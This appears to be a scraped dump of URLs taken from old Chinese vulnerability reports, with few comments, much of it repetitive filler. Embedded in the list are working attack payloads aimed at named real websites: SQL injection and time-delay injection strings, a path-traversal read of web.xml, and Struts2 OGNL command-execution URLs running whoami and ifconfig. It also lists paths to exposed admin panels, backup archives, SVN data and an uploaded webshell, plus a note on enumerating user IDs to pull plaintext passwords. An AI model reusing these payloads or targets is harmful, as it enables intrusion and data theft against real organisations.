http://xuexiao.eol.cn/youeryuan/chengdu/dongtai_detail.php?dongtaiid=19 http://www.gz-l-tax.gov.cn/conn.jsp http://www.gz-l-tax.gov.cn/search.jsp http://s8test.super8.com.cn/FrontEndSystem/Main/BLUE/login.aspx http://dzlzw.gov.cn http://house.xizi.com/index.php?m=agent&c=agent&a=sale&uid=2066220 http://house.xizi.com/esf/rent&areaid=146 http://so.xizi.com/thread.php?fid=13&topicsearch=1&modelid=82&searchname[350][min]=100000%20and%20ord%28mid%28user%28%29,1,1%29%29=114%20&searchname[353]= http://bbs.xizi.com/xz_newshow.php?action=activity&type=3 http://bbs.xizi.com/xz_newshow.php?action=activity&fidalias=47 http://coolpad.anzhuo.cn http://coolpad.anzhuo.cn/rank.php?keyword=&mt=1 http://coolpad.anzhuo.cn/rank.php?keyword=& http://sqlmap.org http://dkp.178.com/?gid=119085&_action=search&_app=dkp&_controller=members http://dkp.178.com:80/ http://gyc.hd.gov.cn/M_Rcqz_View.aspx?ID=000011 www.leyou.com.cn http://www.leyou.com.cn:80/ www.leyou.com.cn https://kyfw.12306.cn/otn/forgetPassword/initforgetMyPassword http://battery.tcl.com/read_news.php?id=27 http://battery.tcl.com/read_products2.php?id=59 http://jobs.tcl.com/career/indexList.view?mask=4 http://xjd.tcl.com/showclick.asp?guid=20130422184740176 http://callcenter.tcl.com/tclcc/portlets/Examine/begin.do?form_id=3 http://www.yhachina.com/topic.php?channelID=6 http://www.yhachina.com/lvshe/index.php?action=login http://publish.linkphone.cn/index.php?m=admin&c=index&a=login&pc_hash= http://www.linkphone.cn/phpsso_server/?m=admin&c=login&a=init&forward= http://whois.chinaz.com/51cto.com http://whois.chinaz.com/linkphone.cn http://whois.chinaz.com/cioage.com http://whois.chinaz.com/watchstor.com http://whois.chinaz.com/hc3i.cn http://e.weibo.com/watchstor http://www.joboto.com/ http://www.fcrs.gov.cn/admin/ad_login.asp http://www.target.com/siteserver/cms/background_contentsGroup.aspx?publishmentSystemID=1&contentGroupName=test'%20and%201=@@version%20and%201='1 http://auto.xizi.com/index.php?m=dealer&c=index&a=shop_products&did=30 http://to.xizi.com/index.php?m=discount&c=index&a=init&areaid=0&classid=0 http://aligooo.x9.fjjsp.net http://aligooo.x9.fjjsp.net/cp.cn?pm=c http://www.cfc108.com/zxjt/YYBModelOne.action http://www.amwaynet.com.cn/onlineTESys/downloadUtil.jsp?fileName=../WEB-INF/web.xml&saveName=web.xml http://house.xizi.com/index.php?m=agent&c=outlet&a=init&aid=123&t=sale http://uc.xizi.com/avatar.php?uid= http://home.xizi.com/index.php?m=company&c=index&a=init&cid=10 http://185.10.107.68:423/ http://185.10.107.68:421/ http://185.10.107.69:421/ http://185.10.107.69:423/ http://v21.56.com/.svn/entries svn://svn.56.com/upload_video svn://svn.56.com svn:special svn:externals svn:needs-lock http://v21.56.com/flv_action_img.php v21.56.com/flv_screenshot_get_img.php?code=b711782d97444b560874cc93581bfbae&img=http://xxx/1.txt&size=65&path=ss.php https://github.com/sunbiz/dhis2-10811 http://www.google.de/#newwindow=1&q=inurl:dhis-web-commons http://dhis.nrhmodisha.in/dhis-web-commons/security/login.action?failed=true http://50.116.20.202:8080/dhis/dhis-web-commons/security/login.action http://service.dghs.gov.bd:8080/mishealth/dhis-web-commons/security/login.action http://ehr.tcl.com http://ehr.tcl.com/ehr http://ehr.tcl.com/ehr http://sqlmap.org http://125.39.193.136/ http://125.39.193.136/userHeadImg/2013/12/06/cd.jsp http://sale.jd.com/act/lIpnyuVZck8vDUaR.html?erpad_source=erpad http://www.informatization.gov.cn/cateinfo.action http://wooyun.org/bugs/wooyun-2010-023688 http://www.tjsafety.gov.cn/admin/admin_login.aspx http://www.tjsafety.gov.cn:80/count.rar http://www.tjsafety.gov.cn/admin/admin_login.aspx http://www.m1905.com/ftp/bjl/711237.shtml display:none http://www.1feel.com http://www.tsrsj.gov.cn/ http://www.tsrsj.gov.cn/ http://www.tsrsj.gov.cn/ http://www.m1905.com/ftp/com2/index.asp http://www.m1905.com/ftp/com3/aibodi.asp http://www.m1905.com/ftp/com4/index.asp http://www.m1905.com/ftp/com1/html/index.html http://www.m1905.com/ftp/com1/html/page_2.html http://www.m1905.com/ftp/com1/html/page_3.html http://www.m1905.com/ftp/com1/html/page_4.html http://www.m1905.com/ftp/com1/html/page_5.html http://www.m1905.com/ftp/com1/html/page_6.html http://www.m1905.com/ftp/com1/html/page_7.html http://www.m1905.com/ftp/com1/html/page_8.html http://www.m1905.com/ftp/com1/html/0.html http://www.m1905.com/ftp/com1/html/1.html http://www.m1905.com/ftp/com1/html/2.html http://www.m1905.com/ftp/com1/html/3.html http://www.m1905.com/ftp/com1/html/4.html http://www.m1905.com/ftp/com1/html/5.html http://www.m1905.com/ftp/com1/html/6.html http://www.m1905.com/ftp/com1/html/7.html http://www.m1905.com/ftp/com1/html/8.html http://www.m1905.com/ftp/com1/html/9.html http://www.m1905.com/ftp/com1/html/10.html http://www.m1905.com/ftp/com1/html/11.html http://www.m1905.com/ftp/com1/html/12.html http://www.m1905.com/ftp/com1/html/13.html http://www.m1905.com/ftp/com1/html/14.html http://www.m1905.com/ftp/com1/html/15.html http://www.m1905.com/ftp/com1/html/16.html http://www.m1905.com/ftp/com1/html/17.html http://www.m1905.com/ftp/com1/html/18.html http://www.m1905.com/ftp/com1/html/19.html http://www.m1905.com/ftp/com1/html/20.html http://www.m1905.com/ftp/com1/html/21.html http://www.m1905.com/ftp/com1/html/22.html http://www.m1905.com/ftp/com1/html/23.html http://www.m1905.com/ftp/com1/html/24.html http://www.m1905.com/ftp/com1/html/25.html http://www.m1905.com/ftp/com1/html/26.html http://www.m1905.com/ftp/com1/html/27.html http://www.m1905.com/ftp/com1/html/28.html http://www.m1905.com/ftp/com1/html/29.html http://www.m1905.com/ftp/com1/html/30.html http://www.m1905.com/ftp/com1/html/31.html http://www.m1905.com/ftp/com1/html/32.html http://www.m1905.com/ftp/com1/html/33.html http://www.m1905.com/ftp/com1/html/34.html http://www.m1905.com/ftp/com1/html/35.html http://www.m1905.com/ftp/com1/html/36.html http://www.m1905.com/ftp/com1/html/37.html http://www.m1905.com/ftp/com1/html/38.html http://www.m1905.com/ftp/com1/html/39.html http://www.m1905.com/ftp/com1/html/40.html http://www.m1905.com/ftp/com1/html/41.html http://www.m1905.com/ftp/com1/html/42.html http://www.m1905.com/ftp/com1/html/43.html http://www.m1905.com/ftp/com1/html/44.html http://www.m1905.com/ftp/com1/html/45.html http://www.m1905.com/ftp/com1/html/46.html http://www.m1905.com/ftp/com1/html/47.html http://www.m1905.com/ftp/com1/html/48.html http://www.m1905.com/ftp/com1/html/49.html http://www.m1905.com/ftp/com1/html/50.html http://www.m1905.com/ftp/com1/html/51.html http://www.m1905.com/ftp/com1/html/52.html http://www.m1905.com/ftp/com1/html/53.html http://www.m1905.com/ftp/com1/html/54.html http://www.m1905.com/ftp/com1/html/55.html http://www.m1905.com/ftp/com1/html/56.html http://www.m1905.com/ftp/com1/html/57.html http://www.m1905.com/ftp/com1/html/58.html http://www.m1905.com/ftp/com1/html/59.html http://www.m1905.com/ftp/com1/html/60.html http://www.m1905.com/ftp/com1/html/61.html http://www.m1905.com/ftp/com1/html/62.html http://www.m1905.com/ftp/com1/html/63.html http://www.m1905.com/ftp/com1/html/64.html http://www.m1905.com/ftp/com1/html/65.html http://www.m1905.com/ftp/com1/html/66.html http://www.m1905.com/ftp/com1/html/67.html http://www.m1905.com/ftp/com1/html/68.html http://www.m1905.com/ftp/com1/html/69.html http://www.m1905.com/ftp/com1/html/70.html http://www.m1905.com/ftp/com1/html/71.html http://www.m1905.com/ftp/com1/html/72.html http://www.m1905.com/ftp/com1/html/73.html http://www.m1905.com/ftp/com1/html/74.html http://www.m1905.com/ftp/com1/html/75.html http://www.m1905.com/ftp/com1/html/76.html http://www.m1905.com/ftp/com1/html/77.html http://www.m1905.com/ftp/com1/html/78.html http://www.m1905.com/ftp/com1/html/79.html http://www.m1905.com/ftp/com1/html/80.html http://www.m1905.com/ftp/com1/html/81.html http://www.m1905.com/ftp/com1/html/82.html http://www.m1905.com/ftp/com1/html/83.html http://www.m1905.com/ftp/com1/html/84.html http://www.m1905.com/ftp/com1/html/85.html http://www.m1905.com/ftp/com1/html/86.html http://www.m1905.com/ftp/com1/html/87.html http://www.m1905.com/ftp/com1/html/88.html http://www.m1905.com/ftp/com1/html/89.html http://www.m1905.com/ftp/com1/html/90.html http://www.m1905.com/ftp/com1/html/91.html http://www.m1905.com/ftp/com1/html/92.html http://www.m1905.com/ftp/com1/html/93.html http://www.m1905.com/ftp/com1/html/94.html http://www.m1905.com/ftp/com1/html/95.html http://www.m1905.com/ftp/com1/html/96.html http://www.m1905.com/ftp/com1/html/97.html http://www.m1905.com/ftp/com1/html/98.html http://www.m1905.com/ftp/com1/html/99.html http://www.m1905.com/ftp/com1/html/100.html http://www.m1905.com/ftp/com1/html/101.html http://www.m1905.com/ftp/com1/html/102.html http://www.m1905.com/ftp/com1/html/103.html http://www.m1905.com/ftp/com1/html/104.html http://www.m1905.com/ftp/com1/html/105.html http://www.m1905.com/ftp/com1/html/106.html http://www.m1905.com/ftp/com1/html/107.html http://www.m1905.com/ftp/com1/html/108.html http://www.m1905.com/ftp/com1/html/109.html http://www.m1905.com/ftp/com1/html/110.html http://www.m1905.com/ftp/com1/html/111.html http://www.m1905.com/ftp/com1/html/112.html http://www.m1905.com/ftp/com1/html/113.html http://www.m1905.com/ftp/com1/html/114.html http://www.m1905.com/ftp/com1/html/115.html http://www.m1905.com/ftp/com1/html/116.html http://www.m1905.com/ftp/com1/html/117.html http://www.m1905.com/ftp/com1/html/118.html http://www.m1905.com/ftp/com1/html/119.html http://www.m1905.com/ftp/com1/html/120.html http://www.m1905.com/ftp/com1/html/121.html http://www.m1905.com/ftp/com1/html/122.html http://www.m1905.com/ftp/com1/html/123.html http://www.m1905.com/ftp/com1/html/124.html http://www.m1905.com/ftp/com1/html/125.html http://www.m1905.com/ftp/com1/html/126.html http://www.m1905.com/ftp/com1/html/127.html http://www.m1905.com/ftp/com1/html/128.html http://www.m1905.com/ftp/com1/html/129.html http://www.m1905.com/ftp/com1/html/130.html http://www.m1905.com/ftp/com1/html/131.html http://www.m1905.com/ftp/com1/html/132.html http://www.m1905.com/ftp/com1/html/133.html http://www.m1905.com/ftp/com1/html/134.html http://www.m1905.com/ftp/com1/html/135.html http://www.m1905.com/ftp/com1/html/136.html http://www.m1905.com/ftp/com1/html/137.html http://www.m1905.com/ftp/com1/html/138.html http://www.m1905.com/ftp/com1/html/139.html http://www.m1905.com/ftp/com1/html/140.html http://www.m1905.com/ftp/com1/html/141.html http://www.m1905.com/ftp/com1/html/142.html http://www.m1905.com/ftp/com1/html/143.html http://www.m1905.com/ftp/com1/html/144.html http://www.m1905.com/ftp/com1/html/145.html http://www.m1905.com/ftp/com1/html/146.html http://www.m1905.com/ftp/com1/html/147.html http://www.m1905.com/ftp/com1/html/148.html http://www.m1905.com/ftp/com1/html/149.html http://www.m1905.com/ftp/com1/html/150.html http://www.m1905.com/ftp/com1/html/151.html http://www.m1905.com/ftp/com1/html/152.html http://www.m1905.com/ftp/com1/html/153.html http://www.m1905.com/ftp/com1/html/154.html http://www.m1905.com/ftp/com1/html/155.html http://www.m1905.com/ftp/com1/html/156.html http://www.m1905.com/ftp/com1/html/157.html http://www.m1905.com/ftp/com1/html/158.html http://www.m1905.com/ftp/com1/html/159.html http://www.m1905.com/ftp/com1/html/160.html http://www.m1905.com/ftp/com1/html/161.html http://www.m1905.com/ftp/com1/html/162.html http://www.m1905.com/ftp/com1/html/163.html http://www.m1905.com/ftp/com1/html/164.html http://www.m1905.com/ftp/com1/html/165.html http://www.m1905.com/ftp/com1/html/166.html http://www.m1905.com/ftp/com1/html/167.html http://www.m1905.com/ftp/com1/html/168.html http://www.m1905.com/ftp/com1/html/169.html http://www.m1905.com/ftp/com1/html/170.html http://www.m1905.com/ftp/com1/html/171.html http://www.m1905.com/ftp/com1/html/172.html http://www.m1905.com/ftp/com1/html/173.html http://www.m1905.com/ftp/com1/html/174.html http://www.m1905.com/ftp/com1/html/175.html http://www.m1905.com/ftp/com1/html/176.html http://www.m1905.com/ftp/com1/html/177.html http://www.m1905.com/ftp/com1/html/178.html http://www.m1905.com/ftp/com1/html/179.html http://www.m1905.com/ftp/com1/html/180.html http://www.m1905.com/ftp/com1/html/181.html http://www.m1905.com/ftp/com1/html/182.html http://www.m1905.com/ftp/com1/html/183.html http://www.m1905.com/ftp/com1/html/184.html http://www.m1905.com/ftp/com1/html/185.html http://www.m1905.com/ftp/com1/html/186.html http://www.m1905.com/ftp/com1/html/187.html http://www.m1905.com/ftp/com1/html/188.html http://www.m1905.com/ftp/com1/html/189.html http://www.m1905.com/ftp/com1/html/190.html http://www.m1905.com/ftp/com1/html/191.html http://www.m1905.com/ftp/com1/html/192.html http://www.m1905.com/ftp/com1/html/193.html http://www.m1905.com/ftp/com1/html/194.html http://www.m1905.com/ftp/com1/html/195.html http://www.m1905.com/ftp/com1/html/196.html http://www.m1905.com/ftp/com1/html/197.html http://www.m1905.com/ftp/com1/html/198.html http://www.m1905.com/ftp/com1/html/199.html http://www.m1905.com/ftp/com1/html/200.html http://www.m1905.com/ftp/com1/html/201.html http://www.m1905.com/ftp/com1/html/202.html http://www.m1905.com/ftp/com1/html/203.html http://www.m1905.com/ftp/com1/html/204.html http://www.m1905.com/ftp/com1/html/205.html http://www.m1905.com/ftp/com1/html/206.html http://www.m1905.com/ftp/com1/html/207.html http://www.m1905.com/ftp/com1/html/208.html http://www.m1905.com/ftp/com1/html/209.html http://www.m1905.com/ftp/com1/html/210.html http://www.m1905.com/ftp/com1/html/211.html http://www.m1905.com/ftp/com1/html/212.html http://www.m1905.com/ftp/com1/html/213.html http://www.m1905.com/ftp/com1/html/214.html http://www.m1905.com/ftp/com1/html/215.html http://www.m1905.com/ftp/com1/html/216.html http://www.m1905.com/ftp/com1/html/217.html http://www.m1905.com/ftp/com1/html/218.html http://www.m1905.com/ftp/com1/html/219.html http://www.m1905.com/ftp/com1/html/220.html http://www.m1905.com/ftp/com1/html/221.html http://www.m1905.com/ftp/com1/html/222.html http://www.m1905.com/ftp/com1/html/223.html http://www.m1905.com/ftp/com1/html/224.html http://www.m1905.com/ftp/com1/html/225.html http://www.m1905.com/ftp/com1/html/226.html http://www.m1905.com/ftp/com1/html/227.html http://www.m1905.com/ftp/com1/html/228.html http://www.m1905.com/ftp/com1/html/229.html http://www.m1905.com/ftp/com1/html/230.html http://www.m1905.com/ftp/com1/html/231.html http://www.m1905.com/ftp/com1/html/232.html http://www.m1905.com/ftp/com1/html/233.html http://www.m1905.com/ftp/com1/html/234.html http://www.m1905.com/ftp/com1/html/235.html http://www.m1905.com/ftp/com1/html/236.html http://www.m1905.com/ftp/com1/html/237.html http://www.m1905.com/ftp/com1/html/238.html http://www.m1905.com/ftp/com1/html/239.html http://www.m1905.com/ftp/com1/html/240.html http://www.m1905.com/ftp/com1/html/241.html http://www.m1905.com/ftp/com1/html/242.html http://www.m1905.com/ftp/com1/html/243.html http://www.m1905.com/ftp/com1/html/244.html http://www.m1905.com/ftp/com1/html/245.html http://www.m1905.com/ftp/com1/html/246.html http://www.m1905.com/ftp/com1/html/247.html http://www.m1905.com/ftp/com1/html/248.html http://www.m1905.com/ftp/com1/html/249.html http://www.m1905.com/ftp/com1/html/250.html http://www.m1905.com/ftp/com1/html/251.html http://www.m1905.com/ftp/com1/html/252.html http://www.m1905.com/ftp/com1/html/253.html http://www.m1905.com/ftp/com1/html/254.html http://www.m1905.com/ftp/com1/html/255.html http://www.m1905.com/ftp/com1/html/256.html http://www.m1905.com/ftp/com1/html/257.html http://www.m1905.com/ftp/com1/html/258.html http://www.m1905.com/ftp/com1/html/259.html http://www.m1905.com/ftp/com1/html/260.html http://www.m1905.com/ftp/com1/html/261.html http://www.m1905.com/ftp/com1/html/262.html http://www.m1905.com/ftp/com1/html/263.html http://www.m1905.com/ftp/com1/html/264.html http://www.m1905.com/ftp/com1/html/265.html http://www.m1905.com/ftp/com1/html/266.html http://www.m1905.com/ftp/com1/html/267.html http://www.m1905.com/ftp/com1/html/268.html http://www.m1905.com/ftp/com1/html/269.html http://www.m1905.com/ftp/com1/html/270.html http://www.m1905.com/ftp/com1/html/271.html http://www.m1905.com/ftp/com1/html/272.html http://www.m1905.com/ftp/com1/html/273.html http://www.m1905.com/ftp/com1/html/274.html http://www.m1905.com/ftp/com1/html/275.html http://www.m1905.com/ftp/com1/html/276.html http://www.m1905.com/ftp/com1/html/277.html http://www.m1905.com/ftp/com1/html/278.html http://www.m1905.com/ftp/com1/html/279.html http://www.m1905.com/ftp/com1/html/280.html http://www.m1905.com/ftp/com1/html/281.html http://www.m1905.com/ftp/com1/html/282.html http://www.m1905.com/ftp/com1/html/283.html http://www.m1905.com/ftp/com1/html/284.html http://www.m1905.com/ftp/com1/html/285.html http://www.m1905.com/ftp/com1/html/286.html http://www.m1905.com/ftp/com1/html/287.html http://www.m1905.com/ftp/com1/html/288.html http://www.m1905.com/ftp/com1/html/289.html http://www.m1905.com/ftp/com1/html/290.html http://www.m1905.com/ftp/com1/html/291.html http://www.m1905.com/ftp/com1/html/292.html http://www.m1905.com/ftp/com1/html/293.html http://www.m1905.com/ftp/com1/html/294.html http://www.m1905.com/ftp/com1/html/295.html http://www.m1905.com/ftp/com1/html/296.html http://www.m1905.com/ftp/com1/html/297.html http://www.m1905.com/ftp/com1/html/298.html http://www.m1905.com/ftp/com1/html/299.html http://www.m1905.com/ftp/com1/html/300.html http://www.m1905.com/ftp/com1/html/301.html http://www.m1905.com/ftp/com1/html/302.html http://www.m1905.com/ftp/com1/html/303.html http://www.m1905.com/ftp/com1/html/304.html http://www.m1905.com/ftp/com1/html/305.html http://www.m1905.com/ftp/com1/html/306.html http://www.m1905.com/ftp/com1/html/307.html http://www.m1905.com/ftp/com1/html/308.html http://www.m1905.com/ftp/com1/html/309.html http://www.m1905.com/ftp/com1/html/310.html http://www.m1905.com/ftp/com1/html/311.html http://www.m1905.com/ftp/com1/html/312.html http://www.m1905.com/ftp/com1/html/313.html http://www.m1905.com/ftp/com1/html/314.html http://www.m1905.com/ftp/com1/html/315.html http://www.m1905.com/ftp/com1/html/316.html http://www.m1905.com/ftp/com1/html/317.html http://www.m1905.com/ftp/com1/html/318.html http://www.m1905.com/ftp/com1/html/319.html http://www.m1905.com/ftp/com1/html/320.html http://www.m1905.com/ftp/com1/html/321.html http://www.m1905.com/ftp/com1/html/322.html http://www.m1905.com/ftp/com1/html/323.html http://www.m1905.com/ftp/com1/html/324.html http://www.m1905.com/ftp/com1/html/325.html http://www.m1905.com/ftp/com1/html/326.html http://www.m1905.com/ftp/com1/html/327.html http://www.m1905.com/ftp/com1/html/328.html http://www.m1905.com/ftp/com1/html/329.html http://www.m1905.com/ftp/com1/html/330.html http://www.m1905.com/ftp/com1/html/331.html http://www.m1905.com/ftp/com1/html/332.html http://www.m1905.com/ftp/com1/html/333.html http://www.m1905.com/ftp/com1/html/334.html http://www.m1905.com/ftp/com1/html/335.html http://www.m1905.com/ftp/com1/html/336.html http://www.m1905.com/ftp/com1/html/337.html http://www.m1905.com/ftp/com1/html/338.html http://www.m1905.com/ftp/com1/html/339.html http://www.m1905.com/ftp/com1/html/340.html http://www.m1905.com/ftp/com1/html/341.html http://www.m1905.com/ftp/com1/html/342.html http://www.m1905.com/ftp/com1/html/343.html http://www.m1905.com/ftp/com1/html/344.html http://www.m1905.com/ftp/com1/html/345.html http://www.m1905.com/ftp/com1/html/346.html http://www.m1905.com/ftp/com1/html/347.html http://www.m1905.com/ftp/com1/html/348.html http://www.m1905.com/ftp/com1/html/349.html http://www.m1905.com/ftp/com1/html/350.html http://www.m1905.com/ftp/com1/html/351.html http://www.m1905.com/ftp/com1/html/352.html http://www.m1905.com/ftp/com1/html/353.html http://www.m1905.com/ftp/com1/html/354.html http://www.m1905.com/ftp/com1/html/355.html http://www.m1905.com/ftp/com1/html/356.html http://www.m1905.com/ftp/com1/html/357.html http://www.m1905.com/ftp/com1/html/358.html http://www.m1905.com/ftp/com1/html/359.html http://www.m1905.com/ftp/com1/html/360.html http://www.m1905.com/ftp/com1/html/361.html http://www.m1905.com/ftp/com1/html/362.html http://www.m1905.com/ftp/com1/html/363.html http://www.m1905.com/ftp/com1/html/364.html http://www.m1905.com/ftp/com1/html/365.html http://www.m1905.com/ftp/com1/html/366.html http://www.m1905.com/ftp/com1/html/367.html http://www.m1905.com/ftp/com1/html/368.html http://www.m1905.com/ftp/com1/html/369.html http://www.m1905.com/ftp/com1/html/370.html http://www.m1905.com/ftp/com1/html/371.html http://www.m1905.com/ftp/com1/html/372.html http://www.m1905.com/ftp/com1/html/373.html http://www.m1905.com/ftp/com1/html/374.html http://www.m1905.com/ftp/com1/html/375.html http://www.m1905.com/ftp/com1/html/376.html http://www.m1905.com/ftp/com1/html/377.html http://www.m1905.com/ftp/com1/html/378.html http://www.m1905.com/ftp/com1/html/379.html http://www.m1905.com/ftp/com1/html/380.html http://www.m1905.com/ftp/com1/html/381.html http://www.m1905.com/ftp/com1/html/382.html http://www.m1905.com/ftp/com1/html/383.html http://www.m1905.com/ftp/com1/html/384.html http://www.m1905.com/ftp/com1/html/385.html http://www.m1905.com/ftp/com1/html/386.html http://www.m1905.com/ftp/com1/html/387.html http://www.m1905.com/ftp/com1/html/388.html http://www.m1905.com/ftp/com1/html/389.html http://www.m1905.com/ftp/com1/html/390.html http://www.m1905.com/ftp/com1/html/391.html http://www.m1905.com/ftp/com1/html/392.html http://www.m1905.com/ftp/com1/html/393.html http://www.m1905.com/ftp/com1/html/394.html http://www.m1905.com/ftp/com1/html/395.html http://www.m1905.com/ftp/com1/html/396.html http://www.m1905.com/ftp/com1/html/397.html http://www.m1905.com/ftp/com1/html/398.html http://www.m1905.com/ftp/com1/html/399.html http://www.m1905.com/ftp/com1/html/400.html http://zgqx.zqgame.com/Main/Tutorial.aspx?type=actnews http://jjc.xjedu.gov.cn/index/index.php http://clock.mo.vancl.com http://wooyun.org/bugs/wooyun-2013-045146 http://www.gzjinsha.gov.cn/wwwroot.rar http://www.gzjinsha.gov.cn/index.php?m=admin http://elutongxing.com/forum/forum/getUserInfo/${id}链接无安全限制。${id}未自增,可以丛0开始遍历。如:http://elutongxing.com/forum/forum/getUserInfo/1。刚链接将返回完整的用户信息,包括明文密码。 http://lib2.cup.edu.cn/browse/cls_browsing_tree.php?s_doctype=99&cls=B&lvl=1 http://lib2.cup.edu.cn/browse/cls_browsing_tree.php?s_doctype=99&cls=B&lvl=1 http://bbs.7daysinn.cn/detail/67021 http://www.ahemc.gov.cn/loginTwo.action http://25555555.com/hotel/chuan/default2.aspx?eid=-1;%20waitfor%20delay%20%270:0:0%27%20--%20&id=1&sid=7 http://25555555.com//hotel/chuan/details.aspx?id=38%20AND%203*2*1%3d6%20AND%20405%3d405 http://25555555.com/hotel/jiudian/jiudianyuding.aspx?endtime=2013-12-07&ID=327&MID=206&starttime=2013-12-06 http://25555555.com/hotel/menpiao/menpiaoyuding.aspx?MID=112%20AND%203*2*1%3d6%20AND%20373%3d373 http://25555555.com/menpiao/chuan/default2.aspx?eid=-1;%20waitfor%20delay%20'0:0:0'%20--%20&id=1&sid=7 http://25555555.com/menpiao/chuan/details.aspx?id=38%20AND%203*2*1%3d6%20AND%20871%3d871 http://25555555.com/menpiao/jiudian/jiudianyuding.aspx?endtime=2013-12-13&ID=56&MID=73&starttime=2013-12-07 http://25555555.com/menpiao/menpiao/menpiaoyuding.aspx?MID=112%20AND%203*2*1%3d6%20AND%20793%3d793 http://25555555.com/newpaybank/chuan/default2.aspx?eid=-1;%20waitfor%20delay%20'0:0:0'%20--%20&id=1&sid=7 http://25555555.com/newpaybank/chuan/details.aspx?id=33%20AND%203*2*1%3d6%20AND%2034%3d34 http://25555555.com/newpaybank/jiudian/jiudianyuding.aspx?endtime=2013-12-13&ID=57&MID=73&starttime=2013-12-07 http://25555555.com/newpaybank/menpiao/menpiaoyuding.aspx?MID=112%20AND%203*2*1%3d6%20AND%20594%3d594 http://25555555.com/ship/chuan/default2.aspx?eid=-1;%20waitfor%20delay%20'0:0:0'%20--%20&id=1&sid=7 http://25555555.com/ship/chuan/details.aspx http://25555555.com/ship/jiudian/jiudianyuding.aspx http://spamlabel.mail.aliyun.com/spamlabel/login.htm http://www.hn118114.cn/?LIN=012021010054 http://218.204.36.28/license!getExpireDateOfDays.act http://www.paidai.com/managetopic.php?action=user_del_topic&boardid=47&topicid=202807&posterid=669387 http://www.paidai.com/managetopic.php?action=user_del_topic&boardid=45&topicid=202809&posterid=669387 http://job.zqgame.com http://job.zqgame.com/admin http://in.sdo.com/wp-admin/ http://mam.sdo.com/index.php?g=Admin&m=Index(现在似乎搜不到了,但猜解等其他方式也不是没可能获得此入口) http://api.mam.sdo.com/index.php?g=Admin&m=Index(似乎游戏服务器也是这个域名) http://ma.sdo.com/web1/data/business.asp看来即便没有注入漏洞也是可以猜解出来的) g.10006.co/lq http://s.zj189.cn http://s.zj189.cn/ http://cp.zj189.cn http://www.cieccpa.org/看了看,果然有很弱的洞洞 http://www.cieccpa.org/admin/ADD.asp http://www.cieccpa.org/admin/ADDUSER.HTM http://www.cieccpa.org/admin/gaiming.asp http://www.cieccpa.org/admin/modifyfile.asp www.jx.cecep.cn www.ceceptic.com www.zx.cecep.cn www.zj.cecep.cn www.iec.cecep.cn www.gyjn.cecep.cn www.sh.cecep.cn www.cecbec.com www.lhtr.cecep.cn www.fd.cecep.cn www.xcl.cecep.cn www.xunbohui.com www.cieccpa.com www.beic.cecic.corp www.tj.cecep.cn www.sd.cecep.cn www.cecamc.cn www.zh.cecep.cn www.zydt.cecep.cn http://struts.apache.org/release/2.3.x/docs/s2-016.html http://kfadmin.zqgame.com/index.action http://kfadmin.zqgame.com/index.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27whoami%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://kfadmin.zqgame.com/index.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27ifconfig%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://zgqx.zqgame.com/Main/ListPage.aspx?type=news http://zgqx.zqgame.com/Main/Tutorial.aspx?type=actmess http://58.83.177.103/ http://58.83.177.102/test.php http://58.83.177.106/ http://58.83.177.103/ http://tg.gw.com.cn/dts/dtsadmin/index.php http://www.cppc.gov.cn/news_play.asp?id=845 http://www.bjfc.gov.cn/cms http://huodong.gw.com.cn/gold230/admin/Menu.php http://www.wooyun.org/bugs/wooyun-2013-045268/trace/423e44ff5296d7db5996934c56078c4b http://huodong.gw.com.cn/gold230//upload/138643384164.php http://huodong.gw.com.cn/M4sk.txt http://c5.dongfeng-citroen.com.cn/news_detail.php?id=25 http://c-quatre.dongfeng-citroen.com.cn/plus/ http://c-quatre.dongfeng-citroen.com.cn/data/ http://c-quatre.dongfeng-citroen.com.cn/data/mysql_error_trace.inc http://c-quatre.dongfeng-citroen.com.cn/gxadmin/login.php?gotopage=%2Fgxadmin%2Fconfig.php http://home.xizi.com http://home.xizi.com/index.php?a=lists_type&c=index&m=content&typeid=63 http://battery.tcl.com/read_news2.php?id=11 http://mgs.homeinns.com/ http://mgs.homeinns.com/motelbbs/ http://mgs.homeinns.com/motelbbs/Themes/b/wdwl.asp www.kumi.cn/360/xiaoyouxi/game.php?content=17613 http://old.homeinns.com/Present/ScoreIndex.aspx?MenuType=1 http://www.ujipin.com/s.php http://www.ujipin.com/goods.php http://ccidstudy.ccidnet.com http://www.online.sdu.edu.cn/schoolbus/ http://drops.wooyun.org/papers/64 http://wshy.daw.so/ http://wshy.daw.so/admin/Upload_Photo.asp http://f.xiashanet.com/post.php?catid=388 https://api.t.163.com/oauth2/authorize?client_id=II5coZy8DdAtKt7a&redirect_uri=http%3A%2F%2Fapp.56.com%2Fcooperate%2Findex.php%3Faction%3DWeibo%26tag%3Dwy%26do%3DCheckLogin%26from%3Dregbox&response_type=code&state=unk-qogvtqoomz http://www.kaixin001.com/login/connect_login.php?appkey=2811954408540d263d3e2d49c54c2a1f&url=http%3A%2F%2Fapi.kaixin001.com%2Foauth2%2Fauthorize%3Fclient_id%3D2811954408540d263d3e2d49c54c2a1f%26response_type%3Dcode%26scope%3Dbasic+create_repaste%26state%3D54285e9d47c41d294eb12615d2be1344%26redirect_uri%3Dhttp%253A%252F%252Fwww.youku.com%252Fpartner_kaixinLoginCallback_wintype_null_operateStfrom_null%26tmp%3D1 http://www.synjones.net/MContent/EasySetup.aspx?type=123 http://sqlmap.org http://61.172.249.125/,存在弱口令账号admin http://202.200.168.108/Login/Index.aspx?LogoutUrl=/login http://wthrcdn.etouch.cn/WeatherApi?citykey=101200101 http://t.cn/8kVihEe http://t%2Ecn/8kVihEe 